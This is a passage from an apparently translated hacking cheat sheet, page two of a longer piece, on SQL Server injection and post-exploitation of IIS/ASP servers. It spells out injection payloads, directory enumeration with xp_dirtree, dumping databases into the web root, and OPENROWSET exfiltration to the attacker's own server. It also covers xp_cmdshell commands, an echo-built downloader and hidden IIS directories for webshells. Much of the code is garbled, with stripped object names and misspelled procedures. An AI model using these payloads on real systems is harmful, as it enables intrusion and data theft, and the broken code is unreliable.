8) Use SQL statements to find the WEB directory: According to experience, the order of the WEB root directory is: D disk, E disk, and C disk. First, we create a temporary table to store the directory tree generated by master..xp_dirtree (suitable for public), and use the following statement:
;create table temp(dir nvarchar(255),depth varchar(255));--, the dir field of this table represents the name of the directory, and the depth field represents the depth of the directory. Then execute xp_dirtree to obtain the directory tree of disk D, and the statement is as follows:
;insert temp(dir,depth) exec .xp_dirtree 'd:';--
Before performing the following operations, first check how many folders there are on the D disk, so that you can have a general understanding of the D disk, and the statements are as follows:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume'))>=Number(number=0, 1, 2, 3...)
Next, we look for several first-level subdirectories on the other party's website, such as user and photo, and then use filtering methods to determine whether this disk exists on the WEB root directory. The statement is as follows:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
Look at the return result of the statement. If true, it means that the WEB root directory may be on this disk. For further confirmation, test several more subdirectories:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
If all test results are true, it means that the WEB root directory is very likely on this disk.
Assume that the WEB root directory found on this disk, use the following statement to obtain the depth of the first-level subdirectory:
and (select depth from temp where dir='user')>=number(number=1, 2, 3...)
Assuming the depth obtained is 3, it means that the user directory is a level 3 directory of D disk, then the WEB root directory is a level 2 directory of D disk.
At present, we already know the drive letter and depth of the root directory. To find the specific location of the root directory, we will start searching one by one from the root directory of disk D. Of course, there is no need to know the name of each directory, otherwise it will take too much time.
Next, another temporary table is created to store all directories in the level 1 subdirectory of disk D. The statement is as follows:
;create table temp1(dir nvarchar(255),depth varchar(255));--
Then save all directories from the first subdirectory of disk D to temp1, and the statement is as follows:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program File s','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp1 exec .xp_dirrtree @dirname
Of course, you can also save all directories under the second subdirectory of disk D into temp1, just change the second top 1 to top 2.
Now, all directories under the first level subdirectory of all D disks have been saved in temp1. Then, we use the same method to determine whether the root directory is in this first level subdirectory:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
If it returns true, it means that the root directory may be in this subdirectory. Remember to test a few more examples. If all return false, it means that the WEB root directory is not in this directory. Then we are using the same method to obtain the list of all directories under the 2nd and 3rd subdirectories of the D disk to determine whether the WEB root directory is under it. However, be careful to delete the contents in the temp1 table before using xp_dirtree.
Now suppose that the WEB root directory is in the first level subdirectory of disk D, and the subdirectory name is website. I don’t need to say anything about how to get the name of this directory. Because we knew earlier that the depth of the WEB root directory is 2, we need to know which one is the real WEB root directory under the website.
Now, we use the same method to create the third temporary table:
;create table temp2(dir nvarchar(255),depth varchar(255));--
Then save all directories from the website of D disk to temp2, and the statement is as follows:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir dir);insert into temp2 exec .xp_dirrtree @dirname
Of course, you can also save all directories under the second subdirectory of the website of D disk into temp2, just change the second top 1 to top 2.
Now, we use the same method to determine whether the directory is the root directory:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
If the return is true, in order to determine our judgment, we will test several more examples. The method mentioned above. If multiple examples return as true, then it is determined that the directory is the WEB root directory.
You can basically obtain the WEB root directory using the above method. Now let's assume that the WEB root directory is: D:\website\www
Then, we can back up the current database to this directory for download. Before backup, we clear the contents of temp, temp1, and temp2, and then save the directory trees of disks C, D, and E to temp, temp1, and temp2 respectively.
After downloading the database, remember to drop the three temporary tables. Now we can find all directory lists in the downloaded database, including the background managed directories and more information.
21. Under win2000, the WEB user is promoted to system user permissions, and the administrator's permission is required to execute:
c:\>cscript C:\Inetpub\AdminScripts\ set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\" "C:\winnt\system32\inetsrv\"
cscript C:\Inetpub\AdminScripts\ set /W3SVC/InProcessIsapiApps "C:\windows\system32\" "C:\windows\system32\inetsrv\" "C:\windows\system32\inetsrv\" "C:\windows\system32\inetsrv\" "C:\windows\system32\" "C:\windows\system32\inetsrv\"
Check whether it is successful:
c:\>cscript C:\Inetpub\AdminScripts\ get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\"
"c:\winnt\system32\inetsrv\"
22. How to hide ASP *s:
Create a non-standard directory: mkdir images..\
Copy the ASP * to the directory: copy c:\inetpub\wwwroot\ c:\inetpub\wwwroot\images..\
Accessing ASP * via web: http://ip/images../?action=login
How to delete non-standard directories: rmdir images..\ /s
23. Remove the ntlm authentication of tenlnet:
;exec .xp_cmdshell 'tlntadmn config sec = -ntlm'—
24. Use echo to write to file to download script:
(1)echo Set x= createObject(^"^"): ^"GET^",LCase((0)),0:():Set s = createObject(^"^"): = 3: = 1:():(): LCase((1)),2 >c:\
(2)c:\>cscript http://127.0.0.1/asp/
25. Methods to manually create IIS hidden directories:
? View the local virtual directory list: c:\inetpub\AdminScripts\ enum w3svc/1/root
? Create a new kiss directory: mkdir c:\asp\kiss
? Create a kiss virtual directory: c:\inetpub\AdminScripts\ -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
? Add execution and write permissions to the kiss directory:
c:\inetpub\AdminScripts\ set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
c:\inetpub\AdminScripts\ set w3svc/1/root/kiss/accessexecute "true" -s:
? ?:Cscript c:\inetpub\AdminScripts\ set /w3svc/1/root/kiss/createprocessasuser false
? Access: http://127.0.0.1/kiss/
26. Use openrowset() to return to the local area for testing:
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]') AS a
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]')
27. Obtain the host name:
/?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28. Obtain the database username:
/?id=1 and 1=convert(int,system_user)--
http:///?id=49 and user>0
select user
29. The second method for ordinary users to obtain WEBSHELL:
? Pack:
EXEC [master].[dbo].[xp_makecab] 'c:\','default',1,'d:\'
Unpacking can be used to get webshell:
? EXEC [master].[dbo].[xp_unpackcab] 'C:\','c:',1, ''
? Read any file content and require master's dbo permission:
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\'
30. Under the sa permission, the known web path is directly backed up the database to the web path.
/?id=1;backuup database Database name to disk='c:\inetpub\wwwroot\' Back up all the obtained data content to the WEB directory, and then download this file using HTTP (of course, you must know the WEB virtual directory first).
? Transfer the system's directory structure, analyze the results and discover the WEB virtual directory, first create a temporary table: temp
/?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
Next: We can use xp_availablemedia to obtain all current drives and save them in the temp table:
/?id=1;insert temp exec .xp_availablemedia;--
? We can obtain the drive list and related information by querying the content of temp or use xp_subdirs to obtain the subdirectory list and store it in the temp table:
/?id=1;insert into temp(id) exec .xp_subdirs 'c:\';--
? We can also use xp_dirtree to obtain the directory tree structure of all subdirectories and enter the temp table:
/?id=1;insert into temp(id,num1) exec .xp_dirtree 'c:\';-- This way you can successfully browse to all directories (folders) lists
? If we need to view the content of a file, we can execute xp_cmdsell:;insert into temp(id) exec .xp_cmdshell 'type c:\web\';--
? Use the 'bulk insert' syntax to insert a text file into a temporary table. For example: bulk insert temp(id) from 'c:\inetpub\wwwroot\' Browse temp to see the content of the file! By analyzing various ASP files, you can obtain a large amount of system information, WEB construction and management information, and even get the connection password of the SA account.
31. Summary of some extended storage in SQL:
xp_availablemedia Displays the available drive letters on the system'C:\' xp_availablemedia
xp_enumgroups List the current system usage group and its description xp_enumgroups
xp_enumdsn Lists the ODBC data source name that has been set on the system xp_enumdsn
xp_dirrtree Displays the subdirectories and file structures in a certain directory xp_dirrtree 'C:\inetpub\wwwroot\'
xp_getfiledetails Get the relevant attributes of a file xp_getfiledetails 'C:\inetpub\'
dbp.xp_makecab The compressed files of the target computer can be connected to a file and separated by bean numbers after the parameters. dbp.xp_makecab 'C:\','evil',1,'C:\inetpub\'
xp_unpackcab Decompress xp_unpackcab 'C:\','C:\temp',1
xp_ntsec_enumdomains List the server domain name xp_ntsec_enumdomains
xp_servicecontrol Stop or start a service xp_servicecontrol 'stop','schedule'
xp_terminate_process Use pid to stop an executed program xp_terminate_process 123
dbo.xp_subdirs
32、
USE MASTER
GO
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from o '
+ N' where OBJECTPROPERTY(, N'''+@isobject+''') = 1 '+N' and & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1. Get all stored procedures scripts:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2. Get all the views scripts:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
33. Database backup method under DB_OWNER permission
Use openrowset. Reversely connect to your own database machine, first build a table with the same structure as the target machine locally. Use nvarchar in the field type. Then use ocean to connect to the other party's SQL database and execute it in the query analysis.
insert into OPENROWSET ('sqloledb','server=IP of your database server;uid=user;pwd=pass;database=dbname;','select * from the table you created) select * from The other party’s table—
If the data volume is too large, check if there are any fields that are automatically numbered in the database. select * from Table name where id>100
Let's do it like this
If you are on the same stage as WEB, it will be OK to directly BAK the library into the WEB directory. . . However, the premise library cannot be too large. If it exceeds 2G, the SQL will time out.
If you have SA permissions, you can use the following two ASP programs to back up the database:
<HTML>
<HEAD>
<TITLE>SQL Server database backup and recovery</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
Select operation: <INPUT TYPE="radio" NAME="act" value="backup"><label for=act_backup>Backup</label>
<INPUT TYPE="radio" NAME="act" value="restore"><label for=act_restore>Recover</label>
<br>Database name: <INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>File path: <INPUT TYPE="text" NAME="bak_file" value="c:\">(Back or restored file path, backing up to EXE is mainly for the convenience of downloading and living...)<br>
<input type="submit" value="OK">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = “localhost” 'sql server
sqlname = "sa" 'Username
sqlpassword = "Database Password" ' Password
sqlLoginTimeout= 15 'Login timeout
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
"input database name"
else
if act = "backup" then
Set srv=("")
= sqlLoginTimeout
sqlserver,sqlname, sqlpassword
Set bak = ("")
=databasename
=Files
=bak_file
srv
if >0 then
&"<font color=red><br>"
&"</font>"
end if
"<font color=green>Backup successful!</font>"
elseif act = "restore" then
'Recovery should be done when the database is not used!
Set srv=("")
= sqlLoginTimeout
sqlserver,sqlname, sqlpassword
Set rest=("")
=0 ' full db restore
=databasename
=Files
=bak_file
=True 'Force restore over existing database
if >0 then
&"<font color=red><br>"
&"</font>"
end if
srv
"<font color=green>Recover successfully!</font>"
else
"<font color=red>No operation selected</font>"
end if
end if
%>
</BODY>
</HTML>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:///TR/xhtml1/DTD/">
<html xmlns="http:///1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Caifeiyang ASP backup MSSQL database program V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">Caifeiyang ASP backup MSSQL database program V1.0 </font></td>
</tr>
<tr>
<td>Select action:
<input type="radio" name="act" value="backup" />
<label for=act_backup>Backup</label>
<input type="radio" name="act" value="restore" />
<label for=act_restore>Recover</label></td>
</tr>
<tr>
<td><label>SQL Server:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>Username:
<input name="sqlname" type="text" value="sa" />
password:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>Database name:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td> file path:
<input name="bak_file" type="text" value="<% =("\")&"\"&""%>" size="60" />
(Backup or restored file path)</td>
</tr>
<tr>
<td><% "Absolute path to this file:" %>
<font color="#FF0000">
<% =(("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="OK" />
<input name="Submit" type="reset" class="liuyes" size="10" value="Reset" //</td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>Prompt message: <%
if request("action")="" then
"<font color=#ff0000>No need to say anything more!</font>"
end if
'Backup and recovery of SQL Server database!
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
"<font color=#ff0000>No database name entered!</font>"
else
if act = "backup" then
Set srv=("")
= sqlLoginTimeout
sqlserver,sqlname, sqlpassword
Set bak = ("")
=databasename
=Files
= 0
= 1
' = True
=bak_file
srv
if >0 then
&"<font color=red><br>"
&"</font>"
end if
"<font color=green>Backup successful!</font>"
elseif act="restore" then
'Recovery should be done when the database is not used!
Set srv=("")
= sqlLoginTimeout
sqlserver,sqlname, sqlpassword
Set rest=("")
=0 ' full db restore
=databasename
=Files
=bak_file
=True 'Force restore over existing database
if >0 then
&"<font color=red><br>"
&"</font>"
end if
srv
"<font color=green>Recover successfully!</font>"
else
"<font color=red>Please select backup or restore!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>
Previous page12Read the full text